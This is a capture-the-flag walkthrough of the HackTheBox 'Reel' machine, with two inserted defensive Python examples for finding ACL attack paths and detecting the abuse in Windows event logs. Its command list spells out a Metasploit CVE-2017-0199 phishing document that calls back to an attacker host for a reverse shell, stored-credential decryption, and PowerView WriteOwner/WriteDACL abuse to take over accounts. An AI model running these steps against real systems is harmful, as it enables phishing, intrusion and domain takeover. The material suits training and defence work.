We covered the HackTheBox Reel machine, which is part of the "Pwn with Metasploit" track. We demonstrated CVE-2017-0199, which affects Microsoft Office, and performed privilege escalation in Active Directory through several methods, including PowerShell runas and abuse of WriteOwner and WriteDACL rights over directory objects.

Reel is a medium-to-hard difficulty machine. It requires a client-side attack to bypass the perimeter and highlights a technique for gaining privileges in an Active Directory environment.

Initial Enumeration

I started with an Nmap scan, which revealed open ports including 21 (FTP), 22 (SSH) and 25 (SMTP). The scan also indicated that the target was likely a Windows Server 2012 R2 machine.

FTP Exploitation

I logged into the FTP server using anonymous credentials (anonymous/anonymous). I downloaded several files from the “documents” directory.

Metadata Analysis

Using exiftool on one of the downloaded Microsoft Office documents, I found an email address: Nico@megabank.com.

SMTP Enumeration

Knowing there was an SMTP server and having an email address, I decided to enumerate for more valid email addresses. I created a wordlist of potential email addresses based on the discovered domain (megabank.com and real.htb). I used an SMTP user enumeration tool (from pentestmonkey) to verify these email addresses. Several addresses, including Nico@real.htb and admin@real.htb, were confirmed to exist.

Phishing Attack with Metasploit

I decided to use a known vulnerability (CVE-2017-0199) related to Microsoft Office documents. Using Metasploit, I generated a malicious RTF document that, when opened, would execute an HTA payload. This HTA payload was hosted on my machine and designed to establish a reverse shell. I configured the Metasploit module with my IP address and specific ports for the HTA server and the reverse shell listener. I then sent this malicious document as an email attachment to Nico@real.htb using the sendemail command-line tool.

Initial Shell and User Flag

Once Nico opened the attachment, I received a Meterpreter session. I navigated to Nico’s user directory and found the user flag and a file named cred.xml.

Credential Extraction

The cred.xml file contained a stored PowerShell credential object for a user named “Tom”, with the password saved as an encrypted secure string. I used a PowerShell command to import the file and decrypt the credential, revealing Tom’s plain-text password.

Pivoting to Tom via SSH

I used Tom’s credentials to log in via SSH. In Tom’s desktop directory, I found a “note” file and BloodHound data, hinting at Active Directory enumeration.

Active Directory Enumeration (Manual Analysis)

I explained that, due to updates in BloodHound, the provided CSV files would not load directly into newer versions. I therefore analyzed the CSV data manually (specifically acls.csv) to find relationships and permissions. I discovered that Tom had WriteOwner rights over an object named “Claire.”

Privilege Escalation (Tom to Claire)

Using PowerView (a PowerShell tool for Active Directory enumeration and exploitation), I leveraged Tom’s WriteOwner permission to take ownership of Claire’s object, grant Tom the ResetPassword right on it, and then change Claire’s password. I then logged in as Claire using the new password.

Privilege Escalation (Claire to Backup Admins)

Analyzing the CSV data again, I found that Claire had WriteDACL permissions over the “Backup Admins” group. I used this permission to add Claire to the “Backup Admins” group.
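The manual acls.csv review in the two steps above (Tom's WriteOwner over Claire, then Claire's WriteDACL over Backup Admins) is exactly the kind of check a defender should automate over their own ACL exports. The script below is an added example and is not code from the original post or from BloodHound; the CSV sample is constructed for this example, the column names are an assumption rather than the exact BloodHound export schema, and the domain EXAMPLE.LOCAL is a placeholder. It keeps only the rights that let a principal take over an object and then searches for a chain of such rights from one principal to a sensitive target.

```python
import csv
import io
from collections import defaultdict, deque

# Constructed sample modelled on an ACL export. Column names are assumptions
# for this example, not the exact BloodHound acls.csv schema.
SAMPLE_ACLS = """ObjectName,ObjectType,PrincipalName,PrincipalType,ActiveDirectoryRights
CLAIRE@EXAMPLE.LOCAL,USER,TOM@EXAMPLE.LOCAL,USER,WriteOwner
BACKUP ADMINS@EXAMPLE.LOCAL,GROUP,CLAIRE@EXAMPLE.LOCAL,USER,WriteDacl
ADMINISTRATOR@EXAMPLE.LOCAL,USER,DOMAIN ADMINS@EXAMPLE.LOCAL,GROUP,GenericAll
TOM@EXAMPLE.LOCAL,USER,TOM@EXAMPLE.LOCAL,USER,ReadProperty
"""

# Rights that allow the holder to take control of the object (owner/DACL
# rewrite, full control, or a forced password reset).
DANGEROUS_RIGHTS = {
    "WriteOwner", "WriteDacl", "GenericAll", "GenericWrite",
    "AllExtendedRights", "ForceChangePassword",
}


def load_acls(csv_text):
    """Parse the CSV export into a list of row dictionaries."""
    return list(csv.DictReader(io.StringIO(csv_text)))


def dangerous_edges(rows):
    """Return (principal, right, object) triples for takeover-capable ACEs.

    Self-referencing ACEs (a principal's rights over its own object) are
    dropped because they do not move an attacker anywhere.
    """
    edges = []
    for row in rows:
        right = row["ActiveDirectoryRights"].strip()
        principal = row["PrincipalName"].strip()
        obj = row["ObjectName"].strip()
        if right in DANGEROUS_RIGHTS and principal != obj:
            edges.append((principal, right, obj))
    return edges


def find_path(edges, start, target, max_depth=6):
    """Breadth-first search from start to target over dangerous edges.

    Returns the list of edges forming the shortest chain, or None if the
    target is not reachable within max_depth hops.
    """
    graph = defaultdict(list)
    for principal, right, obj in edges:
        graph[principal].append((right, obj))

    queue = deque([(start, [])])
    seen = {start}
    while queue:
        node, path = queue.popleft()
        if node == target:
            return path
        if len(path) >= max_depth:
            continue
        for right, obj in graph[node]:
            if obj not in seen:
                seen.add(obj)
                queue.append((obj, path + [(node, right, obj)]))
    return None


def report(csv_text):
    """Group every dangerous ACE by the principal that holds it."""
    holders = defaultdict(list)
    for principal, right, obj in dangerous_edges(load_acls(csv_text)):
        holders[principal].append(f"{right} over {obj}")
    return dict(holders)


if __name__ == "__main__":
    for principal, rights in report(SAMPLE_ACLS).items():
        print(principal, "->", "; ".join(rights))
    chain = find_path(dangerous_edges(load_acls(SAMPLE_ACLS)),
                      "TOM@EXAMPLE.LOCAL", "BACKUP ADMINS@EXAMPLE.LOCAL")
    for principal, right, obj in chain or []:
        print(f"  {principal} --{right}--> {obj}")
```

In a real audit the CSV would come from a directory export rather than the constructed sample, and group membership would be added as extra edges so that rights inherited through a group are also followed. Any non-empty chain ending at a privileged group or account is a misconfiguration to fix, typically by removing the ACE from the lower-privileged principal.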

Final Privilege Escalation (Backup Admins to Administrator)

After logging out and back in as Claire (so that the new group membership took effect), I confirmed that Claire was part of “Backup Admins.” I found that the “Backup Admins” group had full control over the Administrator’s profile directory. Inside a backup script (backup_script.ps1) located in a “backup_scripts” folder, I found the plain-text password for the Administrator account.
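Each step of the escalation chain above leaves a trace in the Windows Security log on the domain controller: the owner and DACL changes on Claire's object, the password reset, and Claire adding herself to Backup Admins. The detection logic below is an added example, not part of the original post; the event records are constructed for this example and use simplified field names (the real events carry the same information under longer names), and the set of monitored groups is an assumption. It uses the standard Windows access-mask bits WRITE_DAC (0x40000) and WRITE_OWNER (0x80000) and event IDs 4662 (operation on a directory object), 4724 (password reset attempt) and 4728 (member added to a security-enabled global group).

```python
# Standard Windows access-mask bits that allow rewriting an object's DACL/owner.
WRITE_DAC = 0x40000
WRITE_OWNER = 0x80000

# Groups whose membership changes should always be reviewed (assumption for
# this example; tune to the environment).
SENSITIVE_GROUPS = {"Backup Admins", "Domain Admins", "Administrators", "Enterprise Admins"}

# Accounts expected to reset other users' passwords (assumption for this example).
HELPDESK_ACCOUNTS = {"administrator", "helpdesk"}

# Constructed sample of simplified Security-log records, in the order the
# chain on this page would produce them.
SAMPLE_EVENTS = [
    {"EventID": 4624, "Subject": "tom", "Target": "tom"},
    {"EventID": 4662, "Subject": "tom", "ObjectType": "user",
     "Object": "CN=Claire,CN=Users,DC=example,DC=local", "AccessMask": WRITE_OWNER},
    {"EventID": 4662, "Subject": "tom", "ObjectType": "user",
     "Object": "CN=Claire,CN=Users,DC=example,DC=local", "AccessMask": WRITE_DAC},
    {"EventID": 4724, "Subject": "tom", "Target": "claire"},
    {"EventID": 4728, "Subject": "claire", "Member": "claire", "Group": "Backup Admins"},
    {"EventID": 4728, "Subject": "administrator", "Member": "bob", "Group": "Helpdesk"},
]


def check_event(ev):
    """Return an alert string for a suspicious record, or None."""
    eid = ev["EventID"]
    if eid == 4662 and ev.get("AccessMask", 0) & (WRITE_DAC | WRITE_OWNER):
        bits = []
        if ev["AccessMask"] & WRITE_OWNER:
            bits.append("WRITE_OWNER")
        if ev["AccessMask"] & WRITE_DAC:
            bits.append("WRITE_DAC")
        return f"{ev['Subject']} used {'|'.join(bits)} on {ev['Object']}"
    if eid == 4724 and ev["Subject"] != ev["Target"] \
            and ev["Subject"] not in HELPDESK_ACCOUNTS:
        return f"{ev['Subject']} reset the password of {ev['Target']}"
    if eid == 4728 and ev["Group"] in SENSITIVE_GROUPS:
        note = " (self-add)" if ev["Subject"] == ev["Member"] else ""
        return f"{ev['Subject']} added {ev['Member']} to {ev['Group']}{note}"
    return None


def detect(events):
    """Run every record through check_event and collect the alerts."""
    return [alert for alert in map(check_event, events) if alert]


def takeover_sequences(events):
    """Correlate: a subject that rewrites owner/DACL on a user object and then
    resets that user's password is performing an object takeover, not admin work.
    Returns (subject, target) pairs."""
    rewrote = set()
    pairs = []
    for ev in events:
        if ev["EventID"] == 4662 and ev.get("AccessMask", 0) & (WRITE_DAC | WRITE_OWNER):
            # First RDN of the DN is the account's CN.
            cn = ev["Object"].split(",")[0].split("=", 1)[1].lower()
            rewrote.add((ev["Subject"], cn))
        elif ev["EventID"] == 4724 and (ev["Subject"], ev["Target"].lower()) in rewrote:
            pairs.append((ev["Subject"], ev["Target"]))
    return pairs


if __name__ == "__main__":
    for line in detect(SAMPLE_EVENTS):
        print("ALERT:", line)
    for subject, target in takeover_sequences(SAMPLE_EVENTS):
        print(f"TAKEOVER: {subject} -> {target}")
```

Event 4662 is only generated when an audit SACL exists on the object, so enabling "Audit Directory Service Access" and placing a SACL on privileged users and groups is a prerequisite; the 4728 and 4724 records come from account-management auditing, which is on by default for domain controllers in most baselines.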

Root Flag

I used the Administrator’s password to SSH into the machine as Administrator and retrieved the root flag.

Technical Commands

  • ftp <IP>
  • anonymous (as FTP username)
  • anonymous (as FTP password)
  • dir
  • cd documents
  • mget *
  • exit (from FTP)
  • cd real
  • exiftool <filename>
  • telnet <IP> 25
  • helo Nico@megabank.com
  • mail from: Nico@megabank.com
  • quit (from telnet)
  • nano maillist
  • smtp-user-enum.pl -M RCPT -U maillist -t <IP>
  • msfconsole
  • search office
  • use exploit/windows/fileformat/office_word_hta
  • options
  • set FILENAME invoice.doc
  • ifconfig
  • set SRVHOST <attacker_IP>
  • set SRVPORT 8080
  • set LHOST <attacker_IP>
  • set LPORT 4445
  • run
  • sendemail -f myname@example.com -t Nico@real.htb -u "Invoice Attached" -m "You are overdue for payment" -a /path/to/invoice.doc -s <target_IP>
  • sessions
  • sessions -i 1
  • pwd (within meterpreter)
  • shell (within meterpreter)
  • cd c:\users
  • dir (within Windows shell)
  • whoami
  • cd Nico
  • cd Desktop
  • type user.txt
  • type cred.xml
  • powershell -C "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential().Password"
  • ssh Tom@<target_IP>
  • cd Desktop
  • cd "Active Directory Audit"
  • type note.txt
  • powershell
  • . .\PowerView.ps1
  • Set-DomainObjectOwner -Identity Claire -OwnerIdentity Tom
  • Add-DomainObjectAcl -TargetIdentity Claire -PrincipalIdentity Tom -Rights ResetPassword
  • $pwd = ConvertTo-SecureString 'P@$$WOrd123!' -AsPlainText -Force (single quotes, so PowerShell does not expand $$ inside the string)
  • Set-DomainUserPassword -Identity Claire -AccountPassword $pwd
  • exit (from Tom’s SSH session)
  • ssh Claire@<target_IP>
  • Add-NetGroupUser -UserName Claire -GroupName "Backup Admins"
  • net group "Backup Admins"
  • exit (from Claire’s SSH session)
  • ssh Claire@<target_IP> (logging back in)
  • net group "Backup Admins"
  • icacls C:\Users\Administrator
  • cd C:\Users\Administrator\Desktop
  • type root.txt
  • cd ..\backup_scripts
  • type backup_script.ps1
  • ssh Administrator@<target_IP>
  • cd Desktop
  • type root.txt

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by Motasem Hamdan, a cybersecurity content creator and YouTuber.
